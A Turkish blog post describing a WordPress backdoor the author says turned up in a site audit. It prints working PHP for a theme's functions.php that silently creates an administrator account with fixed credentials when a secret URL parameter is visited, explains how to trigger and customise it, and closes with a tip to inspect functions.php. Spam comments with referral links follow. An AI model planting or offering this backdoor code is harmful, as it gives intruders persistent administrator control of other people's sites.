Bugün sizlere wordpress backdoor ile wordpress sitelerine backdoor (arka kapı) olarak yeni admin eklemeden bahsedeceğim.
Yönettiğim bir wordpress sitesinde güvenlik denetimi yaparken hiç alışık olmadığım bir kod ile karşılaştım. Bu kodu detaylıca araştırırken gönderdiği girdi ile yeni bir admin oluşturduğunu fark ettim. Bu bahsettiğim kod firefox, chrome gibi normal bir web tarayıcısını kullanarak belirli bir url’ye erişiyor ve tetiklenmesi ile çok basit ama güçlü bir php betiği olduğunu farkettim.
WordPress backdoor tetiklendikten sonra, websitesinde kötü niyetli bir kullanıcının istediği zaman wordpress kurulumuna yeniden erişebilir, yönetici rolüne sahip yeni bir wordpress kullanıcısını otomatik olarak oluşturabilir. Bu yazıda backdoor oluşturan koda bir göz atacağız ve nasıl çalıştığını anlatacağım.
NOT*** : Bu makale SADECE eğitim amaçlıdır. Aslında kimsenin wordpress kurulumunda böyle bir bacdoor (arka kapı) kullanmasını önermiyorum.
WordPress Backdoor
WordPress backdoor aşağıdaki örnekte yer almaktadır. WordPress temasının function.php dosyasına eklenebilen basit bir PHP işlevidir.
<?php add_action('wp_head', 'WordPress_backdoor'); function WordPress_backdoor() { If ($_GET['arka'] == 'kapi') { require('wp-includes/registration.php'); If (!username_exists('backdooradmin')) { $user_id = wp_create_user('backdooradmin', '123123123'); $user = new WP_User($user_id); $user->set_role('administrator'); } } } ?>
WordPress Backdoor, https://veomer.com?arka=kapi URL’sine erişerek tetiklenebilir ( veomer.com sitesinin function.php dosyasına üstte yer alan kod eklenmişse – Denemeyin eklemedim 🙂 .. )
WordPress Backdoor Nasıl Çalışır ?
Yukarıdaki örneği kullanarak, wordpress backdoor tetiklendiğinde, aşağıdaki bilgiler ile yeni bir wordpress yönetici hesabı oluşturur:
Kullanıcı Adı : backdooradmin
Şifre : 123123123
WordPress Backdooru Kullanma
Herhangi bir nedenden dolayı wordpress backdooru kullanmak isterseniz eğer yukarıdaki örnekte belirtilenlerden farklı bir URL kullanın. ( GET değişkenini 5.satırdaki değeri değiştirerek ve ayrıca güçlü bir kullanıcı adı, şifre kullanın onu da 8.satırdaki bilgileri kullanarak..
NOT*** : Tekrar belirtmek isterim ki bu backdoor kullanmanızı önermiyorum. Bu bilgileri sadece eğitim ve güvenlik amaçlı paylaşıyorum. Birinin böyle bir backdoor oluşturması için wordpress dosyalarınızda editleme yetkisi olması lazım. Genellikle ftp bilgileri ile bu girişim yapılabilir. Herhangi bir güvenlik tehdidi ile karşı karşıya iseniz tema dosyanızın içerisinde yer alan function.php dosyasını kontrol etmeyi unutmayınız !
WordPress güvenliği konusunda profesyonel desteğe ihtiyacınız varsa : omer@vegory.com adresinden bana ulaşabilirsiniz.
This is my first time pay a quick visit at here and i am really happy to read everthing at one place
naturally like your web site however you need to take a look at the spelling on several of your posts.
Can you be more specific about the content of your article? After reading it, I still have some doubts. Hope you can help me. https://accounts.binance.com/zh-CN/register?ref=OMM3XK51
There is some nice and utilitarian information on this site. dubai horse race track
Thank you very much for this wonderful information.Live TV
I don’t think the title of your article matches the content lol. Just kidding, mainly because I had some doubts after reading the article. https://www.binance.com/ph/join?ref=S5H7X3LP
Your point of view caught my eye and was very interesting. Thanks. I have a question for you. https://accounts.binance.com/bg/register?ref=DB40ITMB
I do not even understand how I ended up here but I assumed this publish used to be great .-vox live strem
Your article helped me a lot, is there any more related content? Thanks! https://accounts.binance.com/lv/register-person?ref=UM6SMJM3
A big thank you for your blog.Really looking forward to read more.Ecjiuyi 10pcs Solid Plastic Pigeon Eggs Fake Eggs for Racing Pigeons Hatching Supplies – Hot Deals
As I website owner I believe the content material here is really good appreciate it for your efforts. – hey dudes for kids
Your article helped me a lot, is there any more related content? Thanks!